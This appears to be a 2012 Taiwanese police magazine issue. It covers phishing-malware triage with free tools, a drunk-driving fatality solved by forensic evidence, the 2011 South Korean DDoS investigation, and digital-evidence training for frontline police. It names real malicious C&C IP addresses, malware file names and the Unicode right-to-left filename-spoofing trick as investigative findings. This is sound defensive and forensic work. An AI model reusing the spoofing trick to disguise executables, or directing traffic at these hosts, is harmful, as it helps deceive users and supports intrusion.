駭客運用後門程式／木馬程

式成功入侵電腦後，為了取得該電

腦的控制權與避人耳目通常會建立

與該電腦的反向連線，以遠端控制

受害電腦或傳送敏感資料。例如：

常見的木馬程式 NetBus 會用TCP

協定透過Ports 12345與12346進行

資料傳輸。

圖5　 Unicode riht to left （U+202E）檔名製作方式圖6　 Unicode riht to left （U+202E）反轉字元執行檔


常見用來檢查可疑程式的工具

Autoruns

（http://technet.microsoft.

c o m / e n - u s / s y s i n t e r n a l s /

bb963902），此程式顯示在系統

開機或登入期間所執行的程式，

包含啟動資料夾、Run、RunOnce

和登錄機碼中的程式。圖7中使用

Autoruns檢視系統，發現異常程序

SNAC.exe、WmdmPmSN.exe。

Process Explorer



bb896653），此程式是程序檢視

工具，顯示處理程序的詳細路徑、

版本資訊、使用的記憶體。可看

見目前在記憶體中執行的所有程

序，以及每支程序所使用的動態連

結函式庫（DLL），以及執行程序

的所在目錄。圖8中使用Process

Explorer可發現異常程序SNAC.

exe、WmdmPmSN.exe。

TCPView



bb897437），此程式可觀察電

腦有沒有異常連線行為，其會

顯示該電腦所有對外連線記錄，

還會顯示每筆連線記錄是由哪

支程式造成的，可是TCPView無

法看出連線程式存在的目錄，

但只要搭配Process Explorer就

可以輕易看出端倪了。由圖9中

可看出該主機中有惡意程式會

連線至210.238.203.164:443、

210.242.50.146:443等惡意中繼

站。

Virus Total

（https://www.v i rustota l .

com/），VirusTotal是一個免費提

供網路掃毒服務的網站，整合了

包含AhnLab-V3、AntiVir、Antiy-

AVL、Avast、AVG、BitDefender、

ByteHero、CAT-Qu ickHea l、

C l a m A V、 C o m m t o u c h、

圖7　Autoruns顯示畫面

圖9　TCPView顯示畫面

圖10　Virustotal顯示畫面

圖8　Process Explorer顯示畫面

34


Comodo、DrWeb、Emsisoft、

e S a f e、F - P ro t、F - S e c u re、

F o r t i n e t、G D a t a、 I k a r u s、

J i a n g m i n、 K 7 A n t i V i r u s、

Kaspersky、McAfee、McAfee-

G W - E d i t i o n、M i c r o s o f t、

NOD32、Norman、nProtect、

P a n d a、P C To o l s、R i s i n g、

Sophos、SUPERAntiSpyware、

S y m a n t e c、 T h e H a c k e r、

Tota lDe fense、TrendMic ro、

TrendMicro-HouseCall、VBA32、

VIPRE、ViRobot、VirusBuster等

42種世界上優秀的防毒軟體，可協

助一般使用者偵測病毒、蠕蟲、木

馬與各種惡意程式，只要將可能的

問題檔案上傳至VirusTotal網站，該

網站即會免費替您掃毒，您就可得

知上傳的檔案是否潛藏危險。不過

VirusTotal跟一般線上掃毒軟體不

一樣，其只提供單一檔案上傳與掃

毒，並不會協助我們掃描整台電腦

硬碟的病毒或漏洞。

實際案例剖析

某政府單位收到社交工程信

件，如圖11，由寄件者訊息可知

該郵件是由hinet寄出的釣魚郵件，

附件為「101年度因公派員出國計

畫編列暨執行情形表.xls」，由郵

件表頭可知此郵件原始寄件者來

自hinet，其IP為59.125.220.86，

發出時間為CST時區2012/05/18

10:14:51，可據此資料進行資料調

閱。

將附件「101年度因公派員出

圖13　VirusTotal檢測畫面

圖14　弱點掃描畫面

圖15　附件開啟畫面

圖12　郵件標頭內容

圖11　社交工程信件


國計畫編列暨執行情形表.xls」上

傳至VirusTotal檢測，有1家防毒公

司判斷為惡意程式。

將附件「101年度因公派員出

國計畫編列暨執行情形表.xls」進

行弱點掃描，檢測為惡意程式，其

內含.exe之執行檔。

使用Off ice 2003開啟附件

「101年度因公派員出國計畫編列

暨執行情形表.xls」，並無內容資

料。

運用Process Explorer進行檢

查，發現可疑程式，如圖16。

運用TCPView檢查，發現異常

連線連到210.238.203.164，如圖

17。

運用Autoruns檢查，經由檢視

路徑資訊，可發現惡意程式所在，

如圖18。

將可疑檔案hkmsvc.exe傳到

Virustotal分析，有22家防毒軟體檢

測出為惡意程式，如圖20。

結語

透過一些簡單免費的工具對

郵件進行檢測可確認收到之電子郵

件是否真為釣魚郵件，以及該郵件

中所包含的惡意程式其對外連線行

為與位址。透過蒐集分析惡意程

式對外連線IP位址與郵件標頭的來

源IP位址可增加偵查情資的來源管

道。

圖17　TCPView顯示畫面

圖18　Autoruns顯示畫面

圖20　VirusTotal檢測畫面

圖16　Process Explorer顯示畫面

36

辦︱案︱點︱滴　　Case Briefing


文、圖／林文煜（桃園縣政府警察局刑事鑑識中心）

鑑識人員要秉持客觀科學的立場，讓採集

到的證物自然道出案件的真相。

在獲知死者丈夫承認案發時

為駕駛的那一刻，我沒有因鑑識採

證、釐清案情而產生喜悅，但終於

明白美國康州刑事實驗室大門旁立

牌文字給鑑識人員的真諦：

「If the law has made you

a witness, remain a person of

science, you have no victim to

avenge, no gui lty or innocent

person to convict or save, you

must bear testimony within the

limits of science, let the evidence

speak for itself」如果法律賦予你

做為一個鑑定證人，那你必須堅守

客觀科學的立場，在你的心中並沒

有被害人須要你替他伸冤，也沒有

人需要你去認定有罪或無罪，你只

要謹守證詞合乎科學論證原則，其

他就讓證物自己說吧。


案發過程

100年11月某日晚間7時，桃

園縣楊梅市台○○線公里處發生一

起A1車禍死亡案，雨夜裡現場一

輛休旅車翻覆於路面，車底朝天、

毀損情形嚴重，車內一對夫妻，妻

子於車體撞擊翻覆過程遭拋甩出車

外，傷重不治死亡，死者丈夫則爬

出車體呆坐地上打電話求救，其身

上僅受輕傷而無大礙。

當時駕駛不是我

本案經轄區分局派出所、交

通小隊及偵查隊員警到場處理，事

故現場完成照相及測繪等初步蒐證

工作後，將死者丈夫帶回所內製作

筆錄，其指稱當日中午偕同妻子駕

車共同參加同學會聚餐，傍晚活動

結束後，因席間有飲酒，故離開餐

廳時，乃由未飲酒之妻子駕駛車輛

準備返家（兩人均有駕駛執照且平

日均有駕駛此車輛之習慣），但行

經案發路段時，車子突然失控打滑

衝向對向車道旁護欄，然後車體受

強烈撞擊並翻覆，其無法開啟車門

遂爬向後座逃出，最後發現妻子倒

臥於距車子約5公尺遠之地面，已

無生命跡象，對於車輛為何失控或

其他細節，死者丈夫均回答：「當

時駕駛不是我，因為有點酒醉，所

以坐在右前座睡覺，車子是妻子所

駕駛，所以不知道為何會發生這樣

的事情。」

親屬未質疑

這件看似單純的A1車禍死亡

案，事故發生過程並沒有其他車輛

或行人涉入，天雨路滑加上車速過

快似乎是事故發生的主因，當事人

就是車上的這對夫妻，一個死亡、

一個倖存，倖存者日後必須獨力撫

養3個孩子，夫妻的家屬均稱兩人

平日相處和睦，也沒人對於案件提

出任何意見或質疑，加上死者丈夫

痛失妻子後，家庭遭逢巨變表露出

來的哀慟，轄區員警報請檢察官相

驗時，檢察官僅指示鑑識人員釐清

死者是從車體的哪個位置拋出車

外，對於事故發生原因或當時誰駕

駛車輛並沒有細究。

啟人疑竇

轄區分局鑑識小隊依檢察官

指示，再仔細勘察事故車輛以解決

待證事項並釐清相關案情，在完成

車輛勘察及屍體傷勢記錄後，發現

休旅車右側車窗玻璃全部毀損破

裂，右側前後車門亦均因撞擊護欄

及車體翻覆過程中擠壓變形而無法

開啟，但車體左側（駕駛側）之車

窗玻璃則均完好，沒有嚴重毀損情

形，由事故當時所攝照片看來，左

側的車門亦均呈關閉之狀態，故死

者由右側車窗拋出車外應無疑問，

但死者若為案發時之駕駛，那麼她

就必須在車體碰撞及翻覆過程中，

由駕駛側（左側）移向右側，並越

過坐在右前座之丈夫，然後由右側

車窗處脫離車體拋出，這樣的過程

在車輛翻覆的案件中並非不可能發

生，但右前車門因撞擊而嚴重凹

陷，坐在右前座的丈夫僅有輕微擦

傷，當時駕駛之死者則傷重不治，

綜合事故過程、車體毀損情形及兩

人傷勢狀況，富有勘察經驗的鑑識

事故現場護欄凹陷毀損情形右側車窗破裂情形

38


同仁心中產生很大的疑問，坐在右

前座的乘客傷勢應該不輕，甚至考

量翻覆過程所產生的離心力，右前

座乘客可能由右前車窗拋出車體，

這樣的假設似乎與死者丈夫的供詞

不符，那麼會不會是死者丈夫在說

謊？

關鍵影像出現

雖然檢察官及家屬對於何人

才是駕駛並未質疑，但鑑識人員本

於專業的研判及發現真實的好奇心

驅使下，決定請外勤偵辦同仁一同

前往兩夫妻中午聚餐的場所，查訪

有無民眾目擊此對夫妻離開餐廳之

過程，經調閱餐廳停車場監視影像

後，雖然沒有拍攝到夫妻兩人上車

的畫面，但出現了令人匪夷所思的

畫面，有支監視器拍攝到休旅車駛

離停車場的過程，雖然影像畫質不

佳，但隱約可見移動的休旅車中，

乘坐於右前座位置者，身上好像是

穿著或披著紅色的衣物，鑑識人員

再度檢視屍體相驗時所拍攝之照

片，發現死者身上著有一件紅色外

套，這驚人的發現更加深對死者丈

夫供詞的懷疑，也就是他很有可能

才是案發時真正的駕駛。

抽絲剝繭鉅細靡遺鑑於案情似乎不單純，也擔

心不甚清楚的影像畫面無法直接認

定坐在右前座者一定是事故身亡的

婦人，死者丈夫也可能狡稱該紅色

衣物原本披在他身上，故鑑識小隊

同仁決定不先向死者丈夫透露此項

偵查線索，並請求本局刑事鑑識中

心派員，針對事故現場及車輛再仔

細複勘，集思廣益共同發掘其他可

以證明誰是駕駛者的蛛絲馬跡，於

是在案發後第3天，鑑識團隊約同

死者丈夫及家屬，先到事故現場再

把車輛行向、道路情形、最後人車

位置及現場跡證做深入的了解，進

一步釐清案發時車輛行進軌跡、撞

擊點及車體翻覆過程，然後再到保

管休旅車的派出所勘察車輛。

在完成事故車輛原始狀況照

相後，勘察組長指示成員採證重

點，盡可能採集任何可能與案件有

關之物理、化學或生物性跡證，然

後透過進一步的分析與鑑定，最後

綜合現場狀況、車輛毀損情形、死

傷者傷勢情形及各項跡證鑑定結

果，才能做出最可能還原真相的研

判。本案困難之處在於死者及其丈

夫兩人平日均有駕駛此輛休旅車之

習慣，因此在駕駛座方向盤、排檔

休旅車駛離餐廳之監視器畫面車內中座頂面血跡分布情形

死者衣著


桿或駕駛座周圍採得其中一人遺留

之指紋或DNA跡證，無法直接據以

認為該跡證遺留者即為當時之駕駛

者，加上案發過程車體有翻覆的情

形，更增添由跡證遺留位置判斷乘

座者位置之不確定性，經由鑑識人

員詳細的蒐尋擋風玻璃、駕駛座車

窗、右前座車窗、駕駛座座椅及右

前座座椅等處，均未發現遺留可疑

血跡或其他可疑體液斑跡，僅在車

輛中座上方車內頂面及中座座椅上

發現有血跡，這些血跡多屬擦抹或

滴落之型態，研判為事故發生後，

死者丈夫負傷從翻覆的車體中爬出

時所遺留。

拖鞋下的特殊條紋印痕

鑑識人員無法由車內血跡分布

位置與型態判斷夫妻何人是可能的

駕駛者，正當大家對於未能釐清案

情而感到失望之際，中心派駐分局

鑑識巡官一句：「車上這隻藍白拖

鞋鞋底痕跡很特殊，學長你看看會

不會跟案件有啥關聯性？」，所有

勘察同仁的目光投向拖鞋的鞋底，

那數條平行且暗黑的條紋印痕就在

鞋底左前緣處，專業的鑑識訓練讓

我們直覺反應這印痕會不會是踩踏

到某個物件所形成，而這個物件會

不會就是煞車踏板，我們到車內觀

察休旅車的煞車或油門踏板，果不

其然，包覆在踏板上的就是條紋狀

的黑色橡膠，而其間距大小亦與拖

鞋鞋底之條紋印痕相近，接著再用

放大鏡仔細觀察鞋底條紋印痕的新

拖鞋鞋底情形

煞車踏板上條紋狀橡膠近照

鞋底特殊條紋狀印痕

40


舊，發現此拖鞋雖已穿著一段時

間，但條紋印痕與鞋底其他位置相

較，顯得特別新，其上僅沾附微細

的玻璃碎屑，我們合理的推論一定

要穿著拖鞋強力踩踏煞車踏板，才

能形成這樣的印痕，而此印痕可能

就是在事故發生時所產生，那麼誰

比較可能穿藍白拖鞋開車，答案呼

之欲出，但我們沒有直接告訴死者

丈夫拖鞋底有關鍵跡證，只詢問他

拖鞋是誰的，他表示此拖鞋是案發

當天所穿著，事故發生後就一直留

在車內。

留下破碎家庭

有了前述關鍵影帶及拖鞋印

痕等證據，死者丈夫是駕駛者的可

能性變得非常高，結束勘察工作準

備離開之際，我們發現死者的姐妹

們一直都跟死者丈夫在旁邊等待，

彼此互動還算不錯，沒有任何責

怪或不理智的舉動，兩夫妻育有3

子，生還的丈夫勢必需要負起往後

生活的重擔，人死不能復生，或許

家屬對於夫妻誰才是真正的駕駛者

已不在乎，擔心的是如此破碎的家

庭往後日子該怎麼過，於是勘察組

長對著一臉茫然的他說，你那天有

喝酒或許細節不是記得很清楚，如

果想起了什麼（誰開的車），請記

得主動告知分局承辦員警。

真相揭發

幾天後，分局承辦員警把新

事證向檢察官報告，準備再約詢死

者丈夫，出示影帶等相關跡證來戳

破謊言，他起先選擇逃避不配合約

詢安排，最後他還是到了分局，在

警詢筆錄中，承認了他才是事故當

時真正的駕駛，因為酒後駕車釀成

大禍，擔心接受法律的制裁可能就

無法照料3個小孩，在岳母也同意

的情形下，他第一時間告訴警察車

子是妻子開的；於是轄區分

局終以公共危險及過失致

死罪，將死者丈夫移送

地檢署偵辦，而在獲知

死者丈夫承認案發時為

駕駛的那一刻，我沒有往

常因鑑識採證，協助釐清案

情而產生喜悅，但終於明白美國康

州刑事實驗室大門旁立牌上文字給

鑑識人員的真諦：「⋯⋯並沒有被

害人須要你替他伸冤，也沒有人需

要你去認定有罪或無罪，你只要謹

守證詞合乎科學論證原則，其他就

讓證物自己說吧。」

後記

本案警察發現真實或許並非

這個家庭所有成員所樂見，讓肇事

者接受司法制裁也無法弭平親屬的

傷痛，但我想鑑識人員所真正追求

的，應該不只是單純採獲跡證破

案，或是實現自以為的公平正義而

已，要能兼顧合法性及科學性的採

證要求，不帶感情或任何偏見，盡

可能發掘證據，一切就讓證據在法

庭說話吧！


國際合作之省思

文、圖／莊明雄、楊永富（刑事局研發室）

目前DDoS攻擊手段發展迅速，嚴重危及公共安全，警界應提升國際合作的認知，強化跨國聯繫與合作。

DDoS攻擊事件處理與

42

刑︱事︱科︱技︱園︱區　　 Investigative Technology

DDoS攻擊概述

阻斷服務攻擊

所謂阻斷服務攻擊（Denial-

of-service，通常簡稱為DoS），

就是駭客利用自己撰寫或網路下載

的小程式，在短時間內自單一主機

向網站伺服器發送海量般的服務請

求。受攻擊網站短時間內有大量的

使用者請求使用各種網路服務，使

伺服器在一時間無法承受大量的服

務請求而耗盡系統資源，導致一般

正常的使用者無法正常的登入或使

用。

DoS攻擊技術大部分是利用作

業系統在TCP/IP實作上的缺陷進

行攻擊，它們可以僅靠幾個網路封

包就能讓一臺機器癱瘓，直到大部

分機器獲得修補之後，這些攻擊才

可能開始退潮。DoS攻擊將耗盡伺

服器的資源，導致系統無法使用、

阻止或拒絕合法使用者存取某部電

腦。連線到網際網路並以TCP/IP通

訊協定為基礎之網路服務系統或個

人電腦，均有可能遭到攻擊。

分散式阻斷攻擊

在2000年後出現一種全新型

態的DoS攻擊手法，稱之為「分

散式阻斷服務攻擊」（Distributed

D e n i a l o f S e r v i c e，簡稱為

DDoS），這種攻擊是集結網路上

大量的電腦主機，對攻擊目標發送

服務要求（如圖1）。就算是大型

的線上服務平臺業者，也難以抵擋

這種萬箭齊發的威力。DDoS的特

點在於「癱瘓敵人」，而非傳統的

破壞或竊取機密，同時利用網際網

路連結遍布全球的電腦發起攻擊，

難以追蹤其真正的攻擊來源。

許多阻斷服務攻擊工具能夠

實施DDoS攻擊，假設駭客將某個

惡意程式秘密植入網際網路上未設

防的電腦中，攻擊者只須控制秘密

安裝該程式的電腦，就有更多電腦

能同時發動DoS攻擊行動。由於攻

擊程式並不在攻擊者的電腦上執

行，因此很難追蹤實際攻擊者。

殭屍網路

與DDoS攻擊息息相關的是

殭屍網路（B o t n e t）的形成。

Botnet俗稱「殭屍網路」（Zombie

Network），也稱為「機器人網

路」（Robot Network），病毒通

常會隨著e-mail、即時通訊軟體或

電腦系統漏洞侵入電腦，再藏身於

任何一個程式裡。Botnet 病毒與

木馬程式的使用方式類似，但木馬

只會攻擊特定目標，較不會藉由被

植入木馬的電腦主機，再去攻擊其

他電腦。反觀Botnet不但會攻擊

其他電腦，而且它具有「蠕蟲」的

特性，會慢慢在網路空間中爬行，

一遇到有漏洞的電腦主機，就自動

展開攻擊。

「殭屍」指的是一臺遭到破

解的電腦，聽從遠端控制者的指令

做動作。透過傀儡（Bot）軟體的

使用，控制者就能廣播命令到大批

被感染的系統，結合成千上萬電腦

的力量，它們能夠在幾乎沒有預警

的情況下，讓網際網路上的任何一

個網站不支倒地。在今日的網際網

路上，Botnet的計算資源經常是交

易的標的，垃圾郵件者、線上勒索

集團以及任何想要得到原始而且分

散式匿名計算能力的人，都是它們

的買主。

攻擊者

（道士）

最終攻擊的目標

學術單位電腦

學術單位電腦家庭使用者家庭使用者

ISP電腦 DSL家庭使用者政府單位電腦

受DDoS攻擊的電腦

被破解的主機

（被操控的殭屍）

圖1 DDoS攻擊方法

刑事雙月刊49期中華民國101年8月 43刑事雙月刊49期中華民國101年8月

殭屍網路的架構

一般Botnet的組成可概略分為

3個部份（如圖2）：

● 道士（Bot herder）下達攻擊

指令給Botnet成員，為駭客本

身。

● 殭屍（Bot client）亦稱為「肉

雞」，是指被遙控的受害者電

腦，受害者通常不會察覺自己

已遭受感染，而成為Botnet的

一份子。

● Command and control server

（C&C中繼主機）負責管理控

制整個Botnet的中繼主機，並

將Bot herder的指令傳遞給Bot

client。

當一臺電腦被感染而成為

Botnet新成員時，先連向C&C主

機註冊，並等候它的指令，而

Bot herder透過C&C主機得知目前

Botnet的情況，有多少Bot client成

員？各分布在哪些國家？可進行什

麼樣的攻擊？如果Bot herder想要

進行DDos攻擊時，只需下達指令

給 C&C主機，再向下傳達指令給

等待的Bot client，此時所有的Bot

client將攻擊目標電腦，並將執行

結果回傳給C&C主機，駭客可躲

在幕後假借他人之手達到攻擊的目

的。

殭屍網路入侵個人電腦方式

當電腦的作業系統或瀏覽器

有漏洞時，使用者可能因為瀏覽了

一個含有惡意程式的網頁或是部落

格，或是在網路進行下載影音或音

樂檔的同時，病毒就可能暗藏在檔

Botclient

1. 新成員加入向C&C Server註冊，並等候指令

2. C&C Server將指令傳送給Botclient

3. Botclient將執行結果傳送給C&C Server

C&C Server

Botherder

圖2 殭屍網路的架構

44


隊，惡性循環、不斷擴展。

案例研析─2011年南韓網站遭受DDoS攻擊事件

事件摘要

南韓40個主要網站於2011年

3月4日，自當地時間當天上午10

點開始約50分鐘內，持續遭到不

明來源的DDoS攻擊，受攻擊網站

涉及總統府青瓦臺、外交通商部、

國家情報院等政府部門，國民銀行

等金融機構，以及著名搜索引擎

NAVER等企業。

南韓警方處理作法

南韓警方首先分析受害網站

找出殭屍電腦，並從102,207部殭

屍電腦中取得21份惡意程式樣本，

其中95.2％在南韓境內。藉由分析

殭屍電腦上的惡意程式樣本，找

出7個散布惡意程式的網站及境外

案中，不知不覺也被下載了。駭客

可藉此遠端控制電腦主機，不僅竊

取使用者的個人隱私、監控上網活

動，電腦還會像傀儡一樣被控制，

變成駭客竊取他人電腦資料的幫

兇。

目前病毒的感染途徑多數來

自網路，透過網路傳播、自動下載

新病毒或自動更新變種、不斷成

長，最難以掌控的是透過被感染不

知情的電腦，形成龐大的Botnet軍


C&C中繼主機（如圖3），境外主

機的追查係透過國際合作取得C&C

主機的惡意程式樣本等資料，進一

步分析、追蹤發動攻擊行動的幕後

首腦。

南韓透過G8 High Tech Crime

POC、Interpol NCRP、以及Police

Attaché等正式官方管道，向IP位

置所屬的41個國家遞交請求協助文

件。獲得各國家的正面回應後，直

接聯繫各國執法人員協助取得C&C

中繼主機上的惡意程式樣本、系統

與防毒軟體紀錄等資料，隨後分派

偵查人員至國外取得這些資料供後

續分析，相關資料透過FTP或實體

郵包即時傳遞回南韓承辦單位，以

掌握案件處理時效。

我國警方協助取得惡意程式樣本

南韓警方透過國際刑警組織

（Interpol）來函，請求我國刑事

警察局協助蒐集C&C中繼主機的

惡意程式資料，以分析發動DDoS

攻擊的實際來源。本局依來函所

附之IP位址清單，向國內ISP業者

或TWNIC查詢DDoS攻擊期間，涉

案IP位址的實際使用人、單位或機

關，並調閱申用人之基本資料，

同時評估該IP位址使用單位是否具

有發動DDoS攻擊的動機與駭客能

力，或者該單位的電腦已遭入侵殖

入惡意程式成為殭屍網路的一員。

當判斷欲進行調查的電腦可能遭殖

入惡意程式時，事先與該單位之網

管人員聯繫，以利後續現場電腦勘

察，取得惡意程式樣本及其網路連

線紀錄，方能深入追蹤下達DoS攻

擊指令的實際源頭。

本局於進行現場勘察執行下

列步驟以完整蒐集DDoS攻擊的資

訊：（1）檢視電腦是否有異常連

線；（2）記錄C&C中繼主機之網

路連線狀態；（3）備份系統及防

毒軟體之日誌紀錄；（4）採集可

疑程式或檔案之樣本；（5）備份

作業系統磁區供後續分析；（6）

協助單位強化資安防護能力並清除

惡意程式，避免繼續淪為DDoS攻

擊的幫兇。

C&C中繼主機勘察

本局在臺灣涉案主機IP位址：

210.60.x.x進行現場勘察時，使用

「netstat–na」指令查詢電腦的網路

連線狀態，發現有上百條網路通訊

① hacking/installing malware ② spreading malware

③ access to C&C④ deliver instruction to execute attack

⑤ DDoS Attack

Bot Master

Master Server(6)

7 P2P sites

1st C&C(26)

2nd C&C (84)

3rd C&C (630)

Zomble PCs(100,000)

Victims(40)

C&C in Hierarchical Structure (746 in 70 countries)

圖3 2011年DDoS的攻擊架構

46


在同一時間連線至遠端電腦的445

通訊埠，另以網路工具檢視其網路

狀態，可發現該電腦不斷地向遠端

IP位址的445通訊埠進行連線。

檢視防毒軟體的日誌紀錄，

發現有數個被防毒軟體偵測為病毒

並紀錄下來的可疑程式，其中包括

一變種蠕蟲病毒「izrtmu.ixo」，

現場進行電腦勘察時，試圖搜尋出

檔案並進行採樣，供後續分析其

特徵與行為。另以我國內政部警

政署所開發的惡意程式偵測工具

「NPASCAN」來掃瞄電腦，發現4

個疑似惡意程式的檔案（如圖4），

將這些檔案以附加密碼方式製作壓

縮檔案，避免防毒軟體刪除採集完

成的惡意程式樣本（如圖5）。最

後由本局偵查人員製作勘察報告，

提供惡意程式樣本、現場勘察報告

及系統、防毒軟體日誌紀錄供南韓

警方分析並追查攻擊來源。

臺灣提供惡意程式樣本的分析

結果

南韓警方使用「IDA 6.0」及

「BinDiff 3.2」等工具分析惡意程

式的行為與特徵，除分析我國警方

提供的2011年DDoS惡意程式樣本

外，另取出南韓2009年DDoS攻擊

事件中，自C&C中繼主機取得的惡

意程式樣本inetsvc.exe，比對兩者

的執行結構與特徵值。

經分析我國

提供其中一惡意

程式樣本n c s v c .

d l l，顯示臺灣伺

服器（ I P位址：

210.60.x.x）確實

為2011年攻擊事

件所屬Botnet的其

中一部C&C中繼主

機，南韓警方另外

從保加利亞的C&C

中繼主機蒐集的資

料中，亦出現名為

ncsvc.dll的惡意程

式樣本。

我國所提供

的惡意程式樣本

中，msensvc.exe

與sensvc.exe等兩

個程式之功能與

2009年攻擊事件

的樣本inetsvc.exe

完全相同，3隻惡意程式同樣具有

將結果傳送到控制端的指令。經比

對2009年與2011年的惡意程式，

南韓警方另發現其他共通的特徵

點包含：檔案版本與發行人相同

（如圖6）；通訊的加密演算法一

致；中繼站與上層控制者的認證程

序相同；處理通訊錯誤的程序，與

2009年C&C中繼主機的惡意程式

netlmrg.exe相同，都在終止通訊議

程後等待0.03秒（如圖7）。

透過前述分析，南韓警方判

斷2011年與2009年的DDoS攻擊事

件皆由同一嫌犯所發動。

多國惡意程樣本的分析結果

南韓警方分析各合作國家提

供的C&C中繼主機之惡意程式樣

本與相關紀錄後，意外地擴展案件

偵辦初期未發現的746個遠端IP位

址，並明確掌握C&C中繼主機的組

態設定，包括C&C主機的功能與系

統架構、全球C&C主機的分布資

訊、及由攻擊者直接操控的C&C主

機IP位址等資訊，這些情報也成為

發現2011年DDoS攻擊事件幕後首

腦的重要線索。

最後將2011年與2009年的

DDoS攻擊事件做一比較分析，發

現兩案犯罪手法如出一轍，兩起事

件的攻擊目標重疊性相當高，有3

部境外C&C主機被重複採用做為攻

擊中繼站，皆透過遭駭P2P網站散

佈惡意程式，DDoS攻擊的型態與

特徵相似，攻擊目標清單可依指定

時間變更，且都有破壞硬碟資料的

行為。

惡意程式經反組譯碼解析後

圖4 掃描出系統中的可疑檔案

圖5 採集惡意程式樣本


發現兩起攻擊事件的惡意程式特徵

相似度高，且其中軟體版本編號完

全相同，可確認惡意程式為同一人

或同一集團所設計。最後南韓警方

確定2011年DDoS攻擊事件的主謀

與2009年的事件相同，均為北韓

所為。

由本次事件的處理經驗，南

韓警方認為有必要建立一個快速、

有效協調管道。不同國家執法機關

的跨國合作雖可透過如國際刑警組

織（Interpol）等較為正式的管道

進行聯繫與協調，但是這些管道通

常尚有其他案件等待聯繫，對於

DDoS這類需要快速傳遞情報的案

件，資訊的流通可能有所延遲，錯

失破案良機。成功的國際合作相當

仰賴請求協助與受託國家間的彼此

信任，未來可規劃建立異國執法機

關除Interpol以外的技術性合作網

路，加速國際間犯罪情資的流通並

活絡不同國家執法機關間的聯繫工

作。

結語

目前DDoS攻擊事件已經發展

成為一個非常嚴峻的公共安全問

題，甚至被形容為「駭客終極武

器」，但不幸的是目前對付DDoS

的技術卻沒有以等量的速度發展。

由於TCP/IP網際網路協議的缺陷和

無國界性，導致目前的國家機制和

法律都很難追查和懲罰DDoS攻擊

者。

執法機關的國際合作可採取

雙方法律對於犯罪行為的共通規

範，查緝跨國性的網路犯罪活動，

並加速跨國犯罪情資的交換與流

通。另可定期透過參與國際研討會

與跨國訓練課程機會，加強科技犯

罪偵查單位的技術與人際交流，建

立異國科技偵查單位的合作與互信

基礎。

網際網路的興起已打破國家

實體疆界的藩籬，不法份子為了躲

避執法人員的查緝，跨國性網路犯

罪成為犯罪者的不二選擇。惟有提

升國際合作的認知，基於互信、互

助原則強化跨國執法機關間的聯繫

與合作，才有機會從混沌的網路汪

洋中追蹤、緝捕狡詐的罪犯。

圖7 通訊錯誤的處理程序相同

圖6 檔案版本相同

48

論︱壇　　Forum

Technology

48

文／伍姿蓉（臺灣警察專科學校）　圖／編輯室

論納入基層員警為科技警網量能之必要及作為參考美國相關經驗，結合本國現況，發展出屬於自己的標準作

業流程，並培育相關人才，以跟進科技時代的腳步。


Technology

前言

在人類歷史中，改變人類生

活方式的重大轉捩點，大約可分

為2個階段，一是18世紀之工業革

命，再者就是20世紀之電腦的發

明。進入21世紀之後，電腦科技

的發展更是日新月異，變動幅度之

快速及廣泛，另人咋舌！回想電腦

剛起步之時，不僅主機體龐大、占

空間，且速度慢到只能以龜速形

容之，而那也只不過2、30年前的

事！如今電腦網路的快速與便利，

且形體輕巧，帶給現代人生活上重

大的變革，尤其是智慧型手機的推

出，其功能之多、之廣，馬上擄掠

人心，君不見每當這些新款智慧型

手機推出之時，全球各地不少的支

持者為之瘋狂，徹夜排隊、即便阮

囊羞澀，也要搶得新品！

而據我國網路資訊中心之資

料，我國上網人口已占全國總人口

73％，這麼高的上網人口數，可證

電腦網路除已成為人類歷史的重大

發明，也成為人人生活的大部分！

從這麼龐大的上網人口數，可推測

大概只有牙牙學語者或垂垂老者之

外，電腦運用技能已是絕大多數的

現代人必學、必懂、必會及必用的

生活工具。但也是因為如此，而讓

有心人士利用電腦，作為犯罪客

體。面對電腦犯罪，執法人員須有

不同於傳統犯罪的知識技能，方能

克竟其功，因為電腦犯罪具有無遠

弗屆、種類多元且變化快速，以及

數位證據易遭刪除且難以保存等特

性，這些都挑戰執法人員，尤其是

第一線的基層員警的能耐！

偵辦電腦網路等科技犯罪的

執法人員，具備電腦網路專業知識

及技能是起碼的要件，然而，多數

犯罪案件的察知，多是由基層第一

線人員在執行巡邏或臨檢勤務時發

現，經過初步的偵查之後，再交由

經過專業練員警接續辦理。而首先

接觸案件的基層員警所處置案件證

據的品質，常決定案件能否成案、

甚至於是否符合程序正義、進而能

夠將罪嫌定罪的關鍵！在講求證據

的年代，如何避免初步查案者因不

諳偵辦技巧而喪失破案機先，已成

為偵辦電腦網路犯罪的首要任務！

面對新興的電腦網路犯罪，我國是

否能夠提昇基層員警的偵查、應變

及保存證據能力？這是決定我國是

否能夠強化偵辦電腦網路犯罪量能

的關鍵！因為犯罪全球化，先進國

家執法者也得面對電腦犯罪挑戰。

50


常言道：「他山之石，足以

攻錯！」本文想介紹美國刑事司

法學院教導其基層員警如何初步

處置電腦網路犯罪案件的原則與流

程，以利第一線員警知悉數位資料

的保存及合法取得之標準作業流程

（SOP），從介紹他國的作為，俾

供我國相關單位參酌，進而發展出

適用我國第一線員警應行遵循之規

則及標準作業流程。

美國刑事司法學院教導第一

線員警處理數位證據手冊

（www.ojp.usdoj.gov/nij文件編號219941）

因為基層員警散在社會各個

角落，再加上其勤務方式，而成為

回應犯罪案件的第一線人員。處在

電腦時代，要打擊電腦網路犯罪的

有效方法即是強化基層員警最基本

的保存電腦網路證據的知識技能，

以及要求其務必落實合法取得數位

證據的流程，以避免喪失所取得證

據之證據能力。

該手冊有74頁，分成6章，分

別為：簡介、電子儀器種類及數位

證據可能潛藏之處、電子儀器犯罪

現場之保全及建檔、收集證據之流

程、數位證據之打包程序及運送安

全、電子儀器犯罪之類型及證據。

簡介

本手冊目的在協助基層員

警如何察知所面對的狀況乃屬於

電子儀器犯罪，進而展開初步

偵查（Electronic Crime Scene

Investigation）。在簡介中，提到

偵辦案件的基本原則，含偵辦人員

應在蒐集、保全及運送數位證據的

過程中，注意避免改變或破壞證據

內容，例如應避免讓數位證據接近

其他具有磁性之物品；數位證據因

極易遭到毀損，只能由受過電腦網

路專業訓練的人員檢查；在扣押、

運送及儲存數位證據的過程中應全

程建檔保存，以利確保證據之證明

能力及日後需要時可以接受審查，

以符合程序。基於每個案件的獨特

性，上述的基本原則只是通則，偵

辦人員除了要熟悉基本原則之外，

更要能視各案之情況而做調整，例

如所搜查之證據是否受到相關法令

限制，這些法令包含如通訊保密法

及個資保護法等，以符合法定程

序。

電子儀器種類及數位證據可能

潛藏之處

種類之介紹包括以下：

